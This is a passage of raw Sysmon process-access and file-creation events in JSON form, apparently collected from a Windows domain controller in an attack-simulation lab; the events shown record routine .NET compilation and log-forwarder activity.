)","EventReceivedTime":"2020-08-01 07:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9006,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:11.279\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13AF-5F25-0000-001092591100}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:11.279","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13AF-5F25-0000-001092591100}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9007,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:11.279\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13AF-5F25-0000-001092591100}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:11.279","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13AF-5F25-0000-001092591100}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9008,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:11.763\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:11.763","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9009,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:12.779\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:12.779","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9010,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:13.794\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:13.794","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9011,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:14.732\r\nProcessGuid: {E2A3D6B1-13AF-5F25-0000-001092591100}\r\nProcessId: 5100\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\13ec-0\\System.Xml.dll\r\nCreationUtcTime: 2020-08-01 07:03:14.732","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:14.732","ProcessGuid":"{E2A3D6B1-13AF-5F25-0000-001092591100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\13ec-0\\System.Xml.dll","CreationUtcTime":"2020-08-01 07:03:14.732","EventReceivedTime":"2020-08-01 07:03:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9012,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:14.810\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:14.810","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9013,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:14.841\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13B2-5F25-0000-0010795E1100}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 